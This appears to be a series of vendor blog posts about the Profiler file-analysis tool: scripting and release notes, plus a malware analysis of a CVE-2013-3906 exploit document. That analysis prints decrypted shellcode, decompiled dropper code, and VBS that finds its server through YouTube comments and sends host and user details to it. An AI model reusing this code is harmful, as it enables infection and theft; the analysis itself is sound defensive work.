Command-line scripting

The upcoming 2.1 version of Profiler adds support for command-line scripting. This is extremely useful, as it enables users to create small (or big) utilities using the SDK and also to integrate those utilities into their existing tool-chain.

The syntax to run a script from command-line is the following:

cerpro.exe -r foo.py

If we want to run a specific function inside a script, the syntax is:

cerpro.exe -r foo.py:bar

This calls the function ‘bar’ inside the script ‘foo.py’.

Everything following the script/function is passed on as arguments to the script/function itself.

cerpro.exe -r foo.py these "are arguments" for the script

When no function is specified, the arguments can be retrieved from sys.argv.

import sys

print(sys.argv)

For the command line above, the output would be:

['script/path/foo.py', 'these', 'are arguments', 'for', 'the', 'script']

When a function is specified, the arguments are passed on to the function directly:

# cerpro.exe -r foo.py:sum 1 2

def sum(a, b):
    print(int(a) + int(b))

If you actually try one of these examples, you'll notice that Profiler opens its main window, focuses the output view and prints the output of the Python print functions there. The reason for this behaviour is that the command-line support also allows us to instrument the UI from the command line. If we want real console behaviour, we must also specify the ‘-c’ parameter. Remember that we must specify it before the ‘-r’ one, as otherwise it will be consumed as an argument for the script.

cerpro.exe -c -r foo.py:sum 1 2

However, on Windows you won't get any output in the console. The reason is that on Windows an application is either a console or a graphical one. The type is specified statically in the PE format and the system acts accordingly. There are some dirty tricks which allow attaching to the parent's console or allocating a new one, but neither of them is free of glitches. We might come up with a solution for this in the future, but for now, if you need output in console mode on Windows, you'll have to use another way (e.g. write to a file). Of course, you can also use a message box.
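
For example, a trivial workaround is to redirect the output to a log file at the top of the script (plain Python, nothing Profiler-specific; the path is just an example):

import sys

# send all print() output to a log file, since the console is
# unavailable on Windows in this mode
sys.stdout = open(r"C:\Temp\script_output.log", "w")

print("this line ends up in the log file")
sys.stdout.flush()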

from Pro.Core import *

proCoreContext().msgBox(MBIconInfo, "hello world!")

But a message box in a console application usually defeats the purpose of a console application. Again, this issue affects only Windows.

So, let’s write a small sample utility. Let’s say we want to print out all the import descriptor module names in a PE. Here’s the code:

from Pro.Core import *
from Pro.PE import *

def printImports(fname):
    c = createContainerFromFile(fname)
    pe = PEObject()
    if not pe.Load(c):
        return
    it = pe.ImportDescriptors().iterator()
    while it.hasNext():
        descr = it.next()
        offs = pe.RvaToOffset(descr.Num("Name"))
        name, ret = pe.ReadUInt8String(offs, 200)
        if ret:
            print(name.decode("ascii"))

Running the code above with the following command line:

cerpro.exe -r pestuff.py:printImports C:\Windows\regedit.exe

Produces the following output:

ADVAPI32.dll
KERNEL32.dll
GDI32.dll
USER32.dll
msvcrt.dll
api-ms-win-core-path-l1-1-0.dll
SHLWAPI.dll
COMCTL32.dll
COMDLG32.dll
SHELL32.dll
AUTHZ.dll
ACLUI.dll
ole32.dll
ulib.dll
clb.dll
ntdll.dll
UxTheme.dll

Of course, this is not a very useful utility: it's just an example. It's also possible to create utilities which modify files. There are countless utilities which can easily be written.

Another important part of the command-line support is the capability to register logic providers on the fly, which means we can force a custom scan logic from the command line.

from Pro.Core import *
import sys

ctx = proCoreContext()

def init():
    ctx.getSystem().addFile(sys.argv[1])
    return True

def end(ud):
    pass
    
def scanning(sp, ud):
    pass

def scanned(sp, ud):
    pass
    
def rload():
    ctx.unregisterLogicProvider("test_logic")

ctx.registerLogicProvider("test_logic", init, end, scanning, scanned, rload)
ctx.startScan("test_logic")

This script scans a single file passed to it as an argument. All callbacks, aside from init, are optional (they default to None).
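
Relying on the optional callbacks, a minimal sketch of the same idea could therefore be reduced to:

# minimal variant: only the init callback is provided,
# the remaining callbacks default to None
from Pro.Core import *
import sys

ctx = proCoreContext()

def init():
    ctx.getSystem().addFile(sys.argv[1])
    return True

ctx.registerLogicProvider("minimal_logic", init)
ctx.startScan("minimal_logic")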

That’s all! Expect the new release soon along with an additional supported platform. 🙂

Profiler 2.0

The new version 2.0 is out! The most important news is that we have a new online store, which allows orders from individuals and not only from organizations. If you’re not yet one of our customers, make sure to test out our trial. 🙂

We now offer two types of licenses: Home/Academic and Commercial. Also, the price of the commercial license has been reduced. The reason for this is that we stripped active support from the license cost (we now offer support only in the advanced version). After two years on the road we have had very few support requests, so it made sense to make licenses cheaper by removing the cost of support.

We're currently finishing the ports of Profiler to Linux and OSX, so these platforms will be available soon. The current change-list reflects the changes in licensing and our cross-platform effort:

– switched to Visual Studio 2013
– updated Qt to 5.2.1
– updated Python to 3.4
– updated SQLite3
– updated OpenSSL
– switched from the XED2 to the Capstone disasm engine
– added disasm filters for ARM, Thumb, ARM64, MIPS, PowerPC and 8086
– implemented some custom view notifications in Python
– added UI controls to custom views
– made layouts available in the context of the main window
– improved Python SDK
– fixed many small issues

We switched to Qt 5, so PySide is unfortunately no longer supported. On the other hand, the SDK now allows building complex UIs. In fact, we fixed lots of minor issues in the SDK: in recent months we had to offer a lot of SDK support, which forced us to postpone many new features, but the upside is that our SDK has become much more robust.

We also changed our licensing schema, which is no longer year-based, but version based. To compensate current customers for the lack of updates in the last months, we have renewed for free their license for the 2.x series. If you’re an active customer and you haven’t received your new license, please contact us!

Analysis of CVE-2013-3906 (TIFF)

This is just a demonstration of malware analysis with Profiler; I haven't looked into previous literature on the topic. So perhaps there's nothing new here, but I hope it will be of help to our users.

We open the main DOCX file. The first embedded file we analyze is the TIFF image, which stands out because it’s the only image.

TIFF directories

Among the directories we have two which specify an embedded JPEG. So we just select the data area according to the offset and length values and load it as an embedded JPEG (it's a good idea to do this automatically in the future: bear with us, TIFF support has just been introduced).

JPEG data

JPEG embedded

Now we can inspect the embedded JPEG.

JPEG meta

The JPEG looks strange. Even a glance at the format fields suggests it's malformed. Given certain anomalies we can suppose that the TIFF might be used as some sort of vector for something. Let's keep that in mind and take a look at the other files. Two of them stand out: they have a .bin extension and are CFBFs (the same format as DOC files).

CFBF Foreign

We immediately notice various problems. Foreign data is abundant and the file looks malformed. More alarmingly, lots of shellcode warnings are reported. Let's look at a random one (they are basically all the same).

CFBF Shellcode

Let’s start with the analysis of this shellcode.

; nop slide
00001000:  nop 
00001001:  nop 
00001002:  nop 
00001003:  nop 

; decryption code
00001004:  and sp, 0xfffc
00001009:  jmp 0x101c
0000100B:  pop ebx
0000100C:  dec ebx                         ; address of 1020
0000100D:  xor ecx, ecx
0000100F:  or cx, 0x27e                    ; ecx = 0x27E
00001014:  xor byte ptr [ebx+ecx*1], 0xee  ; xor every byte with 0xEE
00001018:  loop 0x1014
0000101A:  jmp 0x1021
0000101C:  call 0x100b

The start of the shellcode is just a decryption loop which xors every byte following the last call with 0xEE. So, that’s exactly what we’re going to do. We select 0x27E bytes after the last call, then we press Ctrl+T to open the filters view.

Decrypt shellcode

We use two filters: ‘misc/basic‘ to xor the bytes and ‘disasm/x86‘ to disassemble them.
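
The same transformation is also trivial to reproduce outside of Profiler. Here's a plain-Python sketch, assuming the encrypted bytes have been dumped to a file (the paths are just examples):

# xor every byte with 0xEE, exactly like the decryption stub does
with open("encrypted.bin", "rb") as f:
    data = f.read(0x27E)

decrypted = bytes(b ^ 0xEE for b in data)

with open("decrypted.bin", "wb") as f:
    f.write(decrypted)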

At this point it’s useful to load the shellcode into a debugger. So let’s select the decrypted shellcode and press Ctrl+R and activate the ‘Shellcode to executable‘ action:

Shellcode to executable

The options dialog will pop up.

Shellcode to executable options

After pressing OK, the debugger will be executed. Depending on your debugger, put a break-point at the beginning of the shellcode and run the code.

The start of the shellcode resolves API addresses:

; resolve APIs
00001021:  jmp 0x1252
00001026:  pop edi                         ; edi = 0x1257
00001027:  mov eax, dword ptr fs:[0x30]
0000102D:  mov eax, dword ptr [eax+0xc]
00001030:  mov esi, dword ptr [eax+0x1c]
00001033:  lodsd dword ptr [esi]
00001034:  mov ebp, dword ptr [eax+0x8]
00001037:  mov esi, dword ptr [eax+0x20]
0000103A:  mov eax, dword ptr [eax]
0000103C:  cmp byte ptr [esi], 0x6b        ; 'k'
0000103F:  jnz 0x1034
00001041:  inc esi
00001042:  inc esi
00001043:  cmp byte ptr [esi], 0x65        ; 'e'
00001046:  jnz 0x1034
00001048:  inc esi
00001049:  inc esi
0000104A:  cmp byte ptr [esi], 0x72        ; 'r'
0000104D:  jnz 0x1046
0000104F:  inc esi
00001050:  inc esi
00001051:  cmp byte ptr [esi], 0x6e        ; 'n'
00001054:  jnz 0x1046
00001056:  mov esi, edi                    ; esi = 0x1257
00001058:  push 0x12
0000105A:  pop ecx
0000105B:  call 0x120d
00001060:  loop 0x105b

This code basically retrieves the base of ‘kernel32.dll’ and then resolves API addresses by calling 0x120d 0x12 times (the number of APIs to be resolved).

This is the function which resolves API name hashes to addresses:

; retrieve API from hash
0000120D:  push ecx
0000120E:  push esi
0000120F:  mov esi, dword ptr [ebp+0x3c]
00001212:  mov esi, dword ptr [esi+ebp*1+0x78]
00001216:  add esi, ebp
00001218:  push esi
00001219:  mov esi, dword ptr [esi+0x20]
0000121C:  add esi, ebp
0000121E:  xor ecx, ecx
00001220:  dec ecx
00001221:  inc ecx
00001222:  lodsd dword ptr [esi]
00001223:  add eax, ebp
00001225:  xor ebx, ebx
00001227:  movsx edx, byte ptr [eax]
0000122A:  cmp dl, dh
0000122C:  jz 0x1236
0000122E:  ror ebx, 0xd
00001231:  add ebx, edx
00001233:  inc eax
00001234:  jmp 0x1227
00001236:  cmp ebx, dword ptr [edi]
00001238:  jnz 0x1221
0000123A:  pop esi
0000123B:  mov ebx, dword ptr [esi+0x24]
0000123E:  add ebx, ebp
00001240:  mov cx, word ptr [ebx+ecx*2]
00001244:  mov ebx, dword ptr [esi+0x1c]
00001247:  add ebx, ebp
00001249:  mov eax, dword ptr [ebx+ecx*4]
0000124C:  add eax, ebp
0000124E:  stosd dword ptr [edi]
0000124F:  pop esi
00001250:  pop ecx
00001251:  ret 

The API hashes are stored at the end of the shellcode. Here are the hashes and the resolved APIs:

; API hashes

Offset     0 1 2 3

00000000  33CA8A5B ; GetTempPathA
00000004  03B8E331 ; FreeLibraryAndExitThread
00000008  A517007C ; CreateFileA
0000000C  FB97FD0F ; CloseHandle
00000010  1F790AE8 ; WriteFile
00000014  02FA0DE6 ; GetCurrentProcessId
00000018  EDDF54E4 ; CreateToolhelp32Snapshot
0000001C  EAB63BB8 ; Thread32First
00000020  08D6FE86 ; Thread32Next
00000024  DC2C8C0E ; SuspendThread
00000028  6F1EC958 ; OpenThread
0000002C  9EF9BB35 ; GetCurrentThreadId
00000030  8E4E0EEC ; LoadLibraryA
00000034  A0D5C94D ; FreeLibrary
00000038  AC08DA76 ; SetFilePointer
0000003C  AD9B7DDF ; GetFileSize
00000040  54CAAF91 ; VirtualAlloc
00000044  1665FA10 ; ReadFile
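
Since the hashing routine is so simple (a ROR-13 accumulator over the export name, as seen in the disassembly above), we can reimplement it in a few lines of Python to double-check the resolved names. Note that the table above shows raw bytes, so each hash has to be read as a little-endian dword:

def ror32(v, n):
    # 32-bit rotate right
    return ((v >> n) | (v << (32 - n))) & 0xFFFFFFFF

def api_hash(name):
    # ror ebx, 0xd / add ebx, edx for every character of the name
    h = 0
    for c in name.encode("ascii"):
        h = (ror32(h, 13) + c) & 0xFFFFFFFF
    return h

# the bytes '1F 79 0A E8' in the table are the little-endian dword 0xE80A791F
print(hex(api_hash("WriteFile")))  # prints 0xe80a791f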

We can actually close the debugger now. Once the API names are known, it’s easy to continue the analysis statically.

The next step in the shellcode is to suspend all other threads in the current process:

; suspend all threads in the current process
00001062:  call dword ptr [esi+0x14]       ; GetCurrentProcessId
00001065:  mov ebx, eax
00001067:  call dword ptr [esi+0x2c]       ; GetCurrentThreadId
0000106A:  push eax
0000106B:  sub esp, 0x1c
0000106E:  xor eax, eax
00001070:  push eax
00001071:  push 0x4
00001073:  call dword ptr [esi+0x18]       ; CreateToolhelp32Snapshot
00001076:  cmp eax, 0xffffffff
00001079:  jz 0x10bf
0000107B:  mov edi, esp
0000107D:  mov dword ptr [edi], 0x1c
00001083:  push eax
00001084:  mov eax, dword ptr [esp]
00001087:  push edi
00001088:  push eax
00001089:  call dword ptr [esi+0x1c]       ; Thread32First
0000108C:  test eax, eax
0000108E:  jz 0x10bc
00001090:  mov eax, dword ptr [edi+0xc]
00001093:  cmp eax, ebx
00001095:  jnz 0x10b0
00001097:  mov eax, dword ptr [edi+0x8]
0000109A:  cmp eax, dword ptr [esp+0x20]
0000109E:  jz 0x10b0
000010A0:  push eax
000010A1:  xor eax, eax
000010A3:  push eax
000010A4:  push 0x1fffff
000010A9:  call dword ptr [esi+0x28]       ; OpenThread
000010AC:  push eax
000010AD:  call dword ptr [esi+0x24]       ; SuspendThread
000010B0:  mov eax, dword ptr [esp]
000010B3:  push edi
000010B4:  push eax
000010B5:  call dword ptr [esi+0x20]       ; Thread32Next
000010B8:  test eax, eax
000010BA:  jnz 0x1090
000010BC:  call dword ptr [esi+0xc]        ; CloseHandle

It then looks for the handle of the main DOCX file in the current process:

; find handle to the current docx:
; it sets the file pointer to 0x20 and reads 4 bytes, it compares them to 0x6f725063
; here's the hex view of the initial bytes:
;
; Offset     0  1  2  3  4  5  6  7    8  9  A  B  C  D  E  F     Ascii   
;
; 00000000  50 4B 03 04 14 00 06 00   08 00 00 00 21 00 56 0B     PK..........!.V.
; 00000010  6D 97 7C 01 00 00 CE 02   00 00 10 00 08 01 64 6F     m.|...........do
; 00000020  63 50 72 6F                                           cPro
;           
000010BF:  xor ebx, ebx
000010C1:  add ebx, 0x4
000010C4:  cmp ebx, 0x100000
000010CA:  jnbe 0x1155
000010D0:  xor eax, eax
000010D2:  push eax
000010D3:  push eax
000010D4:  mov al, 0x20
000010D6:  push eax
000010D7:  push ebx
000010D8:  call dword ptr [esi+0x38]       ; SetFilePointer
000010DB:  cmp eax, 0xffffffff
000010DE:  jz 0x10c1
000010E0:  xor eax, eax
000010E2:  push eax
000010E3:  push ebx
000010E4:  call dword ptr [esi+0x3c]       ; GetFileSize
000010E7:  cmp eax, 0x1000
000010EC:  jl 0x10c1
000010EE:  mov edi, eax
000010F0:  sub esp, 0x4
000010F3:  mov ecx, esp
000010F5:  sub esp, 0x4
000010F8:  mov edx, esp
000010FA:  xor eax, eax
000010FC:  push eax
000010FD:  push ecx
000010FE:  push 0x4
00001100:  push edx
00001101:  push ebx
00001102:  call dword ptr [esi+0x44]      ; ReadFile
00001105:  test eax, eax
00001107:  pop eax
00001108:  pop ecx
00001109:  jz 0x10c1
0000110B:  cmp eax, 0x6f725063
00001110:  jnz 0x10c1
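
As a side note, the magic value 0x6f725063 is simply the dword at offset 0x20 of the DOCX read as little-endian: the four ASCII characters 'cPro', part of the 'docPro…' entry name visible in the hex view above.

import struct

# the signature is just 'cPro' read as a little-endian dword
print(hex(struct.unpack("<I", b"cPro")[0]))  # prints 0x6f725063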

It reads the entire file (minus the first 0x24 bytes) into memory and looks for a certain signature:

; read the entire file apart the first 0x24 bytes
00001112:  sub edi, 0x24                  ; subtract from files size the initial bytes
00001115:  push 0x4
00001117:  push 0x3000
0000111C:  push edi
0000111D:  push 0x0
0000111F:  call dword ptr [esi+0x40]      ; VirtualAlloc
00001122:  sub esp, 0x4
00001125:  mov ecx, esp
00001127:  push 0x0
00001129:  push ecx
0000112A:  push edi
0000112B:  push eax
0000112C:  mov edi, eax                   ; edi = buffer
0000112E:  push ebx
0000112F:  call dword ptr [esi+0x44]      ; ReadFile
00001132:  test eax, eax
00001134:  pop edx
00001135:  jz 0x1155

; find 0xb19b00b5 in the buffer
00001137:  mov eax, 0xb19b00b5
0000113C:  inc edi
0000113D:  dec edx
0000113E:  test edx, edx
00001140:  jle 0x1155
00001142:  cmp dword ptr [edi], eax
00001144:  jnz 0x113c
00001146:  add edi, 0x4                   ; buffer += 4
00001149:  sub edx, 0x4
0000114C:  cmp dword ptr [edi], eax       ; repeat compare
0000114E:  jnz 0x113c
00001150:  add edi, 0x4                   ; buffer += 4
00001153:  jmp 0x119f                     ; jump to decryption
00001155:  mov bx, cs
00001158:  cmp bl, 0x23
0000115B:  jnz 0x1163
0000115D:  xor edx, edx
0000115F:  push edx
00001160:  push edx
00001161:  push edx
00001162:  push edx
00001163:  mov edx, 0xfffff
00001168:  or dx, 0xfff
0000116D:  inc edx
0000116E:  push edx
0000116F:  cmp bl, 0x23
00001172:  jz 0x118d
00001174:  push 0x2
00001176:  pop eax
00001177:  int 0x2e
00001179:  pop edx
0000117A:  cmp al, 0x5
0000117C:  jz 0x1168
0000117E:  mov eax, 0xb19b00b5
00001183:  mov edi, edx
00001185:  scasd dword ptr [edi]
00001186:  jnz 0x116d
00001188:  scasd dword ptr [edi]
00001189:  jnz 0x116d
0000118B:  jmp 0x119f
0000118D:  push 0x26
0000118F:  pop eax
00001190:  xor ecx, ecx
00001192:  mov edx, esp
00001194:  call dword ptr fs:[0xc0]
0000119B:  pop ecx
0000119C:  pop edx
0000119D:  jmp 0x117a

It creates a new file in the temp directory:

0000119F:  sub esp, 0xfc
000011A5:  mov ebx, esp
000011A7:  push ebx
000011A8:  push 0xfc
000011AD:  call dword ptr [esi]            ; GetTempPathA
000011AF:  mov dword ptr [ebx+eax*1], 0x6c2e61
000011B6:  xor eax, eax
000011B8:  push eax
000011B9:  push 0x2
000011BB:  push 0x2
000011BD:  push eax
000011BE:  push eax
000011BF:  push 0x40000000
000011C4:  push ebx
000011C5:  call dword ptr [esi+0x8]        ; CreateFileA
000011C8:  mov edx, eax
000011CA:  push edx
000011CB:  push edx
000011CC:  push ebx

Now comes the juicy part. It reads a few parameters following the matched signature, including a size parameter, and uses these parameters to decrypt a region of data:

; read decryption parameters
000011CD:  mov al, byte ptr [edi]
000011CF:  inc edi
000011D0:  mov bl, byte ptr [edi]
000011D2:  inc edi
000011D3:  mov ecx, dword ptr [edi]
000011D5:  push ecx
000011D6:  add edi, 0x4
000011D9:  push edi
; decryption loop
000011DA:  mov dl, byte ptr [edi]
000011DC:  xor dl, al
000011DE:  mov byte ptr [edi], dl
000011E0:  inc edi
000011E1:  add al, bl
000011E3:  dec ecx
000011E4:  test ecx, ecx
000011E6:  jnz 0x11da

Let's select the same region in the hex view (we find the start address by looking for the signature just as the shellcode does).

Encrypted payload

Then we press Ctrl+E to add an embedded file and we click on filters. Since the decryption routine is too complex to be expressed through a simple filter, we finally have a good reason to use a Lua filter, in particular the ‘lua/custom’ one.

Lua custom filter

As you can see, a sample stub is already provided when clicking on the script value in the options. We have to modify it only slightly for our purposes.

function run(filter)
    local c = filter:container()
    local size = c:size()
    local offset = 0
    local bsize = 16384
    local al = 0x3A
    local bl = 0x9E
    while size ~= 0 do
        if bsize > size then bsize = size end
        local block = c:read(offset, bsize)
        local boffs = 0
        while boffs < bsize do
            local dl = block:readU8(boffs)
            dl = bit.bxor(dl, al)
            block:writeU8(boffs, dl)
            boffs = boffs + 1
            al = bit.band(al + bl, 0xFF)
        end
        c:write(offset, block)
        offset = offset + bsize
        size = size - bsize
    end
    return Base.FilterErr_None
end

By clicking on preview, we can see that the file starts with a typical MZ header. Thus, we can specify a PE file when loading the payload.

PE payload

By inspecting the PE file we can see, among other things, that it's a DLL. Now, before analyzing the DLL, let's finish the shellcode analysis.

The payload is now decrypted. So the shellcode just writes it to the temporary file, loads the DLL, unloads it and then terminates the current thread.

000011E8:  pop edi
000011E9:  pop ecx
000011EA:  pop ebx
000011EB:  pop edx
000011EC:  sub esp, 0x4
000011EF:  mov eax, esp
000011F1:  push 0x0
000011F3:  push eax
000011F4:  push ecx
000011F5:  push edi
000011F6:  push edx
000011F7:  call dword ptr [esi+0x10]       ; WriteFile
000011FA:  pop eax
000011FB:  call dword ptr [esi+0xc]        ; CloseHandle
000011FE:  push ebx
000011FF:  call dword ptr [esi+0x30]       ; LoadLibraryA
00001202:  push eax
00001203:  call dword ptr [esi+0x34]       ; FreeLibrary
00001206:  xor eax, eax
00001208:  push eax
00001209:  push eax
0000120A:  call dword ptr [esi+0x4]        ; FreeLibraryAndExitThread

That's it. Now we can go back to the payload DLL.

One of the resources embedded in the PE file is a DOCX.

Payload DOCX

Probably a sane document to re-open in a reader, so as not to make the user suspicious of a document which didn't open.

There's another suspicious embedded resource, but before making hypotheses about it, let's do a complete analysis of the DLL (don't worry: it's very small). For this purpose I used IDA Pro and the decompiler.

It starts with the DllMain:

BOOL __stdcall DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{
  if ( fdwReason == 1 )
    sub_10001030(hinstDLL);
  return 1;
}

The called function:

HRSRC __cdecl sub_10001030(HMODULE hModule)
{
  HRSRC result; // eax@6
  HRSRC hResInfo; // [sp+0h] [bp-10h]@1
  HRSRC hResInfoa; // [sp+0h] [bp-10h]@6
  HGLOBAL hResData; // [sp+4h] [bp-Ch]@2
  void *hResDataa; // [sp+4h] [bp-Ch]@7
  const void *lpBuffer; // [sp+8h] [bp-8h]@3
  const void *lpBuffera; // [sp+8h] [bp-8h]@8
  DWORD nNumberOfBytesToWrite; // [sp+Ch] [bp-4h]@3
  DWORD nNumberOfBytesToWritea; // [sp+Ch] [bp-4h]@8

  hResInfo = FindResourceA(hModule, "ID_RES1", (LPCSTR)0xA);
  if ( hResInfo )
  {
    hResData = LoadResource(hModule, hResInfo);
    if ( hResData )
    {
      nNumberOfBytesToWrite = SizeofResource(hModule, hResInfo);
      lpBuffer = LockResource(hResData);
      if ( lpBuffer )
        sub_10001200(lpBuffer, nNumberOfBytesToWrite);
      FreeResource(hResData);
    }
  }
  result = FindResourceA(hModule, "ID_RES2", (LPCSTR)0xA);
  hResInfoa = result;
  if ( result )
  {
    result = LoadResource(hModule, result);
    hResDataa = result;
    if ( result )
    {
      nNumberOfBytesToWritea = SizeofResource(hModule, hResInfoa);
      lpBuffera = LockResource(hResDataa);
      if ( lpBuffera )
        sub_10001120(lpBuffera, nNumberOfBytesToWritea);
      result = (HRSRC)FreeResource(hResDataa);
    }
  }
  return result;
}

It basically retrieves both embedded resources and then does something with each of them. First, let's take a look at what it does with the DOCX resource:

char *__cdecl sub_10001200(LPCVOID lpBuffer, DWORD nNumberOfBytesToWrite)
{
  char *result; // eax@10
  int hObject; // [sp+0h] [bp-63Ch]@1
  void *hObjecta; // [sp+0h] [bp-63Ch]@20
  DWORD Type; // [sp+4h] [bp-638h]@1
  int Buffer; // [sp+8h] [bp-634h]@6
  const CHAR CmdLine; // [sp+Ch] [bp-630h]@21
  DWORD cbData; // [sp+210h] [bp-42Ch]@1
  const CHAR ExistingFileName; // [sp+214h] [bp-428h]@19
  LPCSTR lpNewFileName; // [sp+31Ch] [bp-320h]@11
  DWORD NumberOfBytesWritten; // [sp+320h] [bp-31Ch]@4
  CHAR Filename; // [sp+324h] [bp-318h]@21
  HKEY hKey; // [sp+524h] [bp-118h]@9
  DWORD v14; // [sp+528h] [bp-114h]@4
  BYTE Data; // [sp+52Ch] [bp-110h]@10
  unsigned int v16; // [sp+634h] [bp-8h]@1
  char *v17; // [sp+638h] [bp-4h]@19
  int v18; // [sp+63Ch] [bp+0h]@1

  v16 = (unsigned int)&v18 ^ __security_cookie;
  cbData = 260;
  Type = 1;
  hObject = 0;
  while ( 1 )
  {
    hObject += 4;
    if ( hObject > 1048576 )
      break;
    if ( SetFilePointer((HANDLE)hObject, 32, 0, 0) != -1 )
    {
      v14 = GetFileSize((HANDLE)hObject, &NumberOfBytesWritten);
      if ( v14 != -1 )
      {
        if ( (signed int)v14 >= 4096
          && ReadFile((HANDLE)hObject, &Buffer, 4u, &NumberOfBytesWritten, 0)
          && Buffer == 1869762659 )
          break;
      }
    }
  }
  if ( RegOpenKeyExA(HKEY_CURRENT_USER, "Software\\Microsoft\\Office\.0\\Word\\File MRU", 0, 0x20019u, &hKey) )
  {
    result = (char *)sub_10001530(hObject, (char *)&Data);
    if ( result )
      return result;
    lpNewFileName = (LPCSTR)&Data;
  }
  else
  {
    if ( RegQueryValueExA(hKey, "Item 1", 0, &Type, &Data, &cbData) )
    {
      result = (char *)sub_10001530(hObject, (char *)&Data);
      if ( result )
        return result;
      lpNewFileName = (LPCSTR)&Data;
    }
    else
    {
      RegCloseKey(hKey);
      lpNewFileName = strchr((const char *)&Data, '*');
      if ( lpNewFileName )
      {
        ++lpNewFileName;
      }
      else
      {
        result = (char *)sub_10001530(hObject, (char *)&Data);
        if ( result )
          return result;
        lpNewFileName = (LPCSTR)&Data;
      }
    }
  }
  CloseHandle((HANDLE)hObject);
  DeleteFileA(lpNewFileName);
  GetTempPathA(0x104u, (LPSTR)&ExistingFileName);
  result = strrchr(lpNewFileName, '\\');
  v17 = result;
  if ( result )
  {
    ++v17;
    strcat((char *)&ExistingFileName, v17);
    result = (char *)CreateFileA(&ExistingFileName, 0x40000000u, 0, 0, 2u, 0x80u, 0);
    hObjecta = result;
    if ( result != (char *)-1 )
    {
      WriteFile(result, lpBuffer, nNumberOfBytesToWrite, &NumberOfBytesWritten, 0);
      CloseHandle(hObjecta);
      GetModuleFileNameA(0, &Filename, 0x200u);
      sprintf((char *)&CmdLine, "%s /q /t \"%s\"", &Filename, &ExistingFileName);
      WinExec(&CmdLine, 5u);
      result = (char *)CopyFileA(&ExistingFileName, lpNewFileName, 0);
    }
  }
  return result;
}

As hypothesized previously, it just launches a new instance of the current process, this time with the sane DOCX.

Now let's take a look at what it does with the resource we haven't yet identified:

HANDLE __cdecl sub_10001120(LPCVOID lpBuffer, DWORD nNumberOfBytesToWrite)
{
  HANDLE result; // eax@1
  const CHAR Parameters; // [sp+0h] [bp-210h]@1
  HANDLE hObject; // [sp+100h] [bp-110h]@1
  DWORD NumberOfBytesWritten; // [sp+104h] [bp-10Ch]@2
  CHAR Directory; // [sp+108h] [bp-108h]@1
  unsigned int v7; // [sp+20Ch] [bp-4h]@1
  int v8; // [sp+210h] [bp+0h]@1

  v7 = (unsigned int)&v8 ^ __security_cookie;
  GetTempPathA(0x100u, &Directory);
  GetTempPathA(0x100u, (LPSTR)&Parameters);
  strcat((char *)&Parameters, "1.vbe");
  result = CreateFileA(&Parameters, 0x40000000u, 0, 0, 2u, 2u, 0);
  hObject = result;
  if ( result != (HANDLE)-1 )
  {
    WriteFile(hObject, lpBuffer, nNumberOfBytesToWrite, &NumberOfBytesWritten, 0);
    CloseHandle(hObject);
    result = ShellExecuteA(0, "open", "cscript.exe", &Parameters, &Directory, 0);
  }
  return result;
}

It dumps it to a file (with a .vbe extension) and then executes it with 'cscript.exe'. I actually didn't know about VBE files: they're just encoded VBS files. To decode it I used an online tool by GreyMagic.

VBE resource

The VBS code is quite easy to read and quite boring. The only interesting part in my opinion is the update mechanism.

It basically looks for certain comments in two YouTube pages with a regex. The URL captured by the regex is then used to perform the update.

Dim YouTubeLinks(1)
YouTubeLinks(0) = "http://www.youtube.com/watch?v=DZZ3tTTBiTs"
YouTubeLinks(1) = "http://www.youtube.com/watch?v=ky4M9kxUM7Y"

Rem [...]

	while serverExists = 0
		Dim min, max
		min = 0
		max = 1
		Randomize
		
		randLink = YouTubeLinks(Int((max-min+1)*Rnd+min))
		
		outputHTML = getPage(randLink, 60)
		
		Set objRE = New RegExp
		With objRE
			.Pattern = "just something i made up for fun, check out my website at (.*) bye bye"
			.IgnoreCase = True
		End With

		Set objMatch = objRE.Execute( outputHTML )

		If objMatch.Count = 1 Then
			server = objMatch.Item(0).Submatches(0)
		End If
		
		server = "http://" & server
		
		if getPage(server & "/Status.php", 30) = "OK" Then
			serverExists = 1
		End if
	Wend

It sends back to the URL various information about the current machine:

	up = getPage(server & "/Up.php?sn=" & Serial & "&v=" & version & "&av=" & installedAV, 60)
Else
	while Len(Serial) <> 5
		getSerial = getPage(server & "/gsn.php?new=" & computerName & ":" & userName & "&v=" & version & "&av=" & installedAV, 60)

As a final anecdote: the main part of the script just contains an enormous byte array which is dumped to file. The file is a PNG with a RAR file appended to it, which in turn contains a VBE-encoding executable. The script itself doesn't seem to make use of this, so no idea why it's there.

Appended RAR
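
As a side note, locating such an appended archive programmatically is easy, since RAR files start with a well-known signature. A quick sketch, assuming the PNG has been dumped to disk (hypothetical paths):

# look for the RAR 4.x signature inside the dumped PNG
with open("dumped.png", "rb") as f:
    data = f.read()

pos = data.find(b"Rar!\x1a\x07\x00")
if pos != -1:
    with open("appended.rar", "wb") as f:
        f.write(data[pos:])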

That's all. While it may seem like a lot of work, writing the article took much longer than performing the actual analysis (~30 minutes, including screenshots).

We hope it may be of help or interest to someone.

News for version 1.1

And here it is.

– added libmagic to the SDK
– added preliminary ELF support
– added TIFF support
– added GZ, BZ2 and LZMA file support
– exposed internal API for files and paths to Python
– hooks are now triggered even when loading embedded objects in the workspace
– added magic info extension script
– exposed more DEX methods to Python
– remember manually enabled extensions
– capability to add individual files in the scan page
– some bug fixes

Enjoy.

TIFF Support

The upcoming 1.1 version of Profiler includes support for TIFF image files. This addition completes the list of the most popular supported image formats (JPEG, PNG/APNG, GIF, BMP/DIB, TIFF). The support was actually already partially there, because the Exif format (which is just an embedded TIFF) inside JPEG files has been supported since the first public version of Profiler, but somehow actual TIFF support hadn't yet been added.

Multi-page TIFF

In a few days the new version will be released.

libmagic Support

While Profiler offers an API to identify file formats, it does so only for those which are supported. The list of supported files is vast, but there will always be unrecognized formats.

It’s certainly a good idea to introduce a file signature identification API. This API might be useful for several purposes, not all foreseeable right away. That’s why the upcoming version introduces support for libmagic (it comes with the latest 5.11 version). The library is exposed to Python in the ‘Pro.magic’ module. Here are the functions:

magic_buffer(magic_t m, NTByteArray const & buf) -> char const *
magic_builtin_db_name() -> NTString
magic_check(magic_t m, char const * fname) -> int
magic_close(magic_t m)
magic_compile(magic_t m, char const * fname) -> int
magic_descriptor(magic_t m, int fd) -> char const *
magic_errno(magic_t m) -> int
magic_error(magic_t m) -> char const *
magic_file(magic_t m, char const * fname) -> char const *
magic_getpath(char const * fname, int action) -> char const *
magic_list(magic_t m, char const * fname) -> int
magic_load(magic_t m, char const * fname) -> int
magic_open(int flags) -> magic_t
magic_setflags(magic_t m, int flags) -> int

Just as a note: magic_file just calls magic_buffer internally.
